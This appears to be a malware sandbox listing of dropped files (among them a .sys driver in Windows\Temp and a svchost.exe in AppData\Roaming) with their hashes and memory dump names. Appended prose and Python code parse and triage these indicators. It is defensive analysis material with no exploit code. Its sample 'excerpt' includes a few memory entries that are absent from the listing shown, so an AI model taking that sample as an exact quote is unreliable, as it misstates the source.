C:\Windows\Temp\ceihoregnmpc.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

memory/312-8917-0x000001297DD60000-0x000001297DE19000-memory.dmp

memory/3168-9380-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5512-10128-0x0000024778E40000-0x0000024778EF9000-memory.dmp

memory/2540-11004-0x0000000005D50000-0x0000000005D5E000-memory.dmp

memory/2540-11005-0x0000000007830000-0x000000000784A000-memory.dmp

memory/2540-11026-0x0000000008910000-0x0000000008F88000-memory.dmp

memory/2540-11027-0x0000000007980000-0x00000000079A2000-memory.dmp

memory/2540-11028-0x0000000007AE0000-0x0000000007B2A000-memory.dmp

memory/2540-11029-0x0000000008290000-0x00000000085E0000-memory.dmp

memory/2540-11035-0x00000000088C0000-0x000000000890B000-memory.dmp

memory/6092-11516-0x000001F9657F0000-0x000001F9658A9000-memory.dmp

memory/5420-12708-0x000001CB1BCA0000-0x000001CB1BD59000-memory.dmp

memory/2540-12849-0x00000000074F0000-0x00000000074FC000-memory.dmp

memory/512-13813-0x000001C4A8700000-0x000001C4A87B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\c1b6ba76-a5e5-4bd6-9fae-f7826b2f46e3

MD5 60ecbe259a5fb0044d91e24aea333dda
SHA1 05ccc995d2f05b0cc736e4d6863433081bf6bb20
SHA256 c61709d83e35e5627822ba0948b1c4d1d5e2ad55e5ba7be35152c2fe16c77583
SHA512 caca6d84e213051ec476cf72731d063e8debb691d438c82ed13ff117881d8ef47d11c308b21596c2efa1bdf3c6785a8e9d3aad15f43baca710c9c3df863317a5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\7449ec9c-bbf8-4aaf-b546-560453def526

MD5 1091b360fb0e33fbf35073e1efdf2461
SHA1 3b288d489725608e35bb8043e193ddf0f0e1138a
SHA256 8e1c78cd391845d0fb2c75e916ef51d1e220f5dd7be04f34ae6b75cb1c0ffd07
SHA512 92aaaebd5d7166e6a4089cf206e196b9aad2e9d59f24b99bd19b2418096cef9b7337d364450b79c846b13a612578c29ca8e2b16a25a346108da2c89c18a9607f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

MD5 ab317854b84cabf9cbd20886b8433ec5
SHA1 10be75fd1cd30ad5e085722ee837987d5c386976
SHA256 14a9183bb1988312b1389115011cec5974be1ee5998d3261d596ec81246246b7
SHA512 9bd810b47f12af0406b56ab1fdf4aa586184a9cbcd7187dda851a6ae879a07430a93f662e6c2cc9432f6d75eb2beab853f3061b2266a3734e8572a8f114daed5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 88085cab30527f66309293166fbd150a
SHA1 838dd0b6d20c8af227c36192b2208329782aaf97
SHA256 718728be8fafa2732384e516fcce4d940d3f465bafdd22584b6b5746c006f1d4
SHA512 e7ef556988feb2f3cdc12af8a7498e061deaf3e9ea6bcc7d3f9062cb140cb00286d6149ce379af5eed69a5b2968eea6f1b821094d679e21aa000dc7a4f8fb82c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 6507abbe7564352f80049c0958a4882f
SHA1 8854a6235318b33b1042a02e84a8dcea33e98a6d
SHA256 f61a9f71daef9bc98e411a4112e062091f1e9f5c6333b2fb511d15aea2b52405
SHA512 e81f5ae1b9698e7db5a24cbb35afd1ed54413c141d64a08a9b5d096832cb9cc13add20ad5221cc57f46bb61f0f12594a9944d3ef107ff9007c5791a3ddb0c838

memory/6988-15319-0x00000263CAF80000-0x00000263CB039000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 7f868e557b098795d645df9ea302427f
SHA1 001f3306144559b4049a8ab139b4139f51e59c0e
SHA256 b228e23ecfb7965e3badefcbb031de0b4bb887634bccb34a826ac8ac89124ac5
SHA512 56fd8aa514cc25db5a2c9191d665eaffe90182cc5e4f15317e0cfbc9adf7336d9ad937d20384b0504f784e5939b76b4c4b0020cb06e4a472c650355cc6c4c89a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

MD5 38d8c9dfd7cfc142a6de0b5ac8f8584d
SHA1 391e9afdccda54b74803b2117355df1a6e051704
SHA256 93c1575efc11a5684cd929305f02bb25fcee2a562c8e1095f023e5c01ce18063
SHA512 e91dd599dcaeed65cb58bc5f97bca4d446bb3429af09c294c67213635dd9f108dcdadf8ccf0ab7dae69b87240edd63bb9a36f3a86e7b0bd7cdf3111b6d79f308

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

MD5 07e50fe839af18b9cad9b0010b3e380f
SHA1 b2c94991255eaedc9f8ae16d26ef87cb484bdc4c
SHA256 2121c0bb90a5c6b39df1c986365dfad6bd1050e9a9d4a534785076d19c9e7962
SHA512 3bd1851f03549ef5cd755fe75991542b4423b9600661abd606d6b82c580742c55985ce90b9bb9ef11ccee2dfea2a2ed73af1698376a372d948698144d02ccbc0

memory/6072-16658-0x0000013EDB8E0000-0x0000013EDB999000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 ad67f4e8cb0ebe4e501b1eb568975deb
SHA1 df287aaf8bb79630bf1f7c4ef9d32894397f077a
SHA256 83732bbbb324acca1cfd36326f8025145f53c522ff53d2612f18eb70f6edf3ab
SHA512 6f92a6eb46fd0bc54415d73e609099caea125033702054163abbca5ed8d0cecca2c6490f4aef091f96761c0d1ca8907333388b0243dcdb8e968f2eaeb2895c31

memory/5520-17950-0x0000015BB0710000-0x0000015BB07C9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionCheckpoints.json

MD5 2d87ba02e79c11351c1d478b06ca9b29
SHA1 4b0fb1927ca869256e9e2e2d480c3feb8e67e6f1
SHA256 16b7be97c92e0b75b9f8a3c22e90177941c7e6e3fbb97c8d46432554429f3524
SHA512 be7e128c140a88348c3676afc49a143227c013056007406c66a3cae16aae170543ca8a0749136702411f502f2c933891d7dcdde0db81c5733415c818f1668185

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore.jsonlz4

MD5 be6a07aa01d40714f5b7c200ccaa228f
SHA1 b84d335a44e8b40a6b2f4f29787614a1a61753ed
SHA256 0863e4388aac45e52e64f0e39e1e32accf27af32abc7f4ad3d62f7be16668c90
SHA512 6d1049fcf558588e589ff2cec886ef56a35fa75a5aeed3cb00e97c662729c71912e49d1eaad73acef1dd713ab8b5a303b4ec21aff6e141256321eaab636aa72e

memory/5052-19326-0x00000283F5F70000-0x00000283F6029000-memory.dmp

memory/1988-19509-0x0000000007890000-0x0000000007BE0000-memory.dmp

memory/1988-19512-0x0000000007CA0000-0x0000000007CEB000-memory.dmp

memory/1988-19573-0x000000006FBA0000-0x000000006FBEB000-memory.dmp

memory/1988-19580-0x0000000008F70000-0x0000000009015000-memory.dmp

memory/5028-19799-0x0000000006CB0000-0x0000000007000000-memory.dmp

memory/5028-19800-0x0000000007A20000-0x0000000007A6B000-memory.dmp

memory/5028-19817-0x000000006FC50000-0x000000006FC9B000-memory.dmp

memory/5028-19822-0x0000000008F00000-0x0000000008FA5000-memory.dmp

memory/5804-20075-0x00000000077E0000-0x0000000007B30000-memory.dmp

memory/5804-20078-0x00000000081D0000-0x000000000821B000-memory.dmp

memory/5804-20104-0x0000000071450000-0x000000007149B000-memory.dmp

memory/5200-20454-0x000000006FC50000-0x000000006FC9B000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 9af17c8393f0970ee5136bd3ffa27001
SHA1 4b285b72c1a11285a25f31f2597e090da6bbc049
SHA256 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512 b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

memory/2576-21441-0x00000206FB990000-0x00000206FBA49000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EwzwBAA8HrlUzg2\Display\Display.png

MD5 0b60f991c226be9643e2c01be52cb020
SHA1 83dce419a82f969012dd519d7b85abc6c34029ca
SHA256 66b7fb9022a10e8d06a1538e37c6d82e31a35380fbc6ef2da90fd564fd34ef60
SHA512 2801f1492b12107fdb5865bd47ae9aaf78a265967e05f242efddbf0147a3b41b36e2b6bfabe7a3b201b4e8a9308856b1c9fed724376db1acb01cfe6ed2b5977a

memory/5008-22502-0x000002052B1D0000-0x000002052B289000-memory.dmp

memory/5940-23834-0x0000029DA0480000-0x0000029DA0539000-memory.dmp

memory/7076-25107-0x000001DEFF290000-0x000001DEFF349000-memory.dmp

memory/4760-30125-0x000001EEE6000000-0x000001EEE60B9000-memory.dmp

memory/4776-31528-0x0000029DEBBD0000-0x0000029DEBC89000-memory.dmp

memory/6664-34083-0x0000024BEEB90000-0x0000024BEEC49000-memory.dmp

memory/6788-35271-0x0000021472830000-0x00000214728E9000-memory.dmp

memory/6408-37830-0x0000027CFF330000-0x0000027CFF3E9000-memory.dmp

memory/5272-41261-0x0000014155C50000-0x0000014155D09000-memory.dmp

memory/1256-43813-0x000001AFACA90000-0x000001AFACB49000-memory.dmp

memory/6212-45182-0x000001F2C0860000-0x000001F2C0919000-memory.dmp

memory/6704-46381-0x000002116E6F0000-0x000002116E7A9000-memory.dmp

memory/5688-47695-0x0000023ACE9C0000-0x0000023ACEA79000-memory.dmp

memory/7480-48903-0x0000020EEBE80000-0x0000020EEBF39000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b7bb147d02d2b97a3643ea497f5d91
SHA1 984757ff593a7ce6c9d4becebf8fad707046d1c4
SHA256 714dd2b9c4acb9211b2179f47ef6850bb475b8b624b5ebea1aec2727ea82e931
SHA512 92295e03cff4d36b66c7947dc9aaae44c5b3898fcb0f95c266fe80b872b49927b79f20d8d999cc09873ee78268c98c55f285e1410ab03a3a76ca5b091ead403c
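The listing above mixes two record kinds: a dropped or modified file (a path followed by MD5, SHA1, SHA256 and SHA512 lines) and a memory dump named `memory/<pid>-<event>-<start>-<end>-memory.dmp`. Copying it into a blocklist as-is is a mistake, because most of the paths are the host's own churn (Firefox profile files, the PowerShell `StartupProfileData-NonInteractive` cache) rather than payloads, and the same memory region is dumped many times. The following Python is an added example, not code from the sandbox vendor or from this report: it parses the listing, checks every hash has the right length, separates likely payload files from profile noise, and groups memory dumps by PID and region so repeated snapshots collapse into one line. The sample input is an excerpt of the listing above; the noise-path patterns are a heuristic of this example, not something the report states.

```python
import re
from collections import defaultdict

# Excerpt of the "Files" listing above (copied from the report; not constructed data).
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 9af17c8393f0970ee5136bd3ffa27001
SHA1 4b285b72c1a11285a25f31f2597e090da6bbc049
SHA256 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512 b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

C:\Windows\Temp\ceihoregnmpc.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 88085cab30527f66309293166fbd150a
SHA1 838dd0b6d20c8af227c36192b2208329782aaf97
SHA256 718728be8fafa2732384e516fcce4d940d3f465bafdd22584b6b5746c006f1d4
SHA512 e7ef556988feb2f3cdc12af8a7498e061deaf3e9ea6bcc7d3f9062cb140cb00286d6149ce379af5eed69a5b2968eea6f1b821094d679e21aa000dc7a4f8fb82c

memory/2056-2134-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3168-2142-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3168-2143-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3168-9380-0x0000000140000000-0x0000000140848000-memory.dmp
"""

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMORY_LINE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$"
)

# Heuristic (an assumption of this example): paths that are host state touched
# during detonation rather than dropped payloads. Tune per environment.
NOISE_PATTERNS = [
    r"\\Mozilla\\Firefox\\Profiles\\",
    r"\\PowerShell\\StartupProfileData-NonInteractive$",
]


def parse_listing(text):
    """Split the listing into file records (path + hashes) and memory-dump records."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMORY_LINE.match(line)
        if m:
            pid, event, start, end = m.groups()
            dumps.append({"pid": int(pid), "event": int(event),
                          "start": int(start, 16), "end": int(end, 16)})
            current = None
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
            continue
        # Any other non-empty line is a path that opens a new file record.
        current = {"path": line, "hashes": {}}
        files.append(current)
    return files, dumps


def hash_problems(files):
    """Return (path, algo, reason) for every missing or wrongly sized digest."""
    problems = []
    for f in files:
        for algo, length in HASH_LENGTHS.items():
            value = f["hashes"].get(algo)
            if value is None:
                problems.append((f["path"], algo, "missing"))
            elif len(value) != length:
                problems.append((f["path"], algo, f"bad length {len(value)}"))
    return problems


def likely_payload_iocs(files):
    """Drop records whose path matches a known host-churn location."""
    return [f for f in files
            if not any(re.search(p, f["path"], re.IGNORECASE) for p in NOISE_PATTERNS)]


def summarize_dumps(dumps):
    """Map pid -> {(base, size): number of times that region was dumped}."""
    summary = defaultdict(lambda: defaultdict(int))
    for d in dumps:
        summary[d["pid"]][(d["start"], d["end"] - d["start"])] += 1
    return {pid: dict(regions) for pid, regions in summary.items()}


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE_LISTING)
    for problem in hash_problems(files):
        print("hash problem:", problem)
    for f in likely_payload_iocs(files):
        print(f["path"], f["hashes"]["SHA256"])
    for pid, regions in summarize_dumps(dumps).items():
        for (base, size), n in regions.items():
            print(f"pid {pid}: base 0x{base:X} size 0x{size:X} dumped {n} time(s)")
```

The dump summary is where the triage value is: PID 3168 has one region at base `0x140000000` of size `0x848000` snapshotted repeatedly, which is the conventional default image base of a 64-bit PE and so points at a native image loaded without relocation; which malware family that image belongs to is not something this listing states, so the code reports only base, size and count. The hash check matters because report copy-paste often truncates a SHA512 by a character, and a wrong-length digest silently matches nothing in a blocklist.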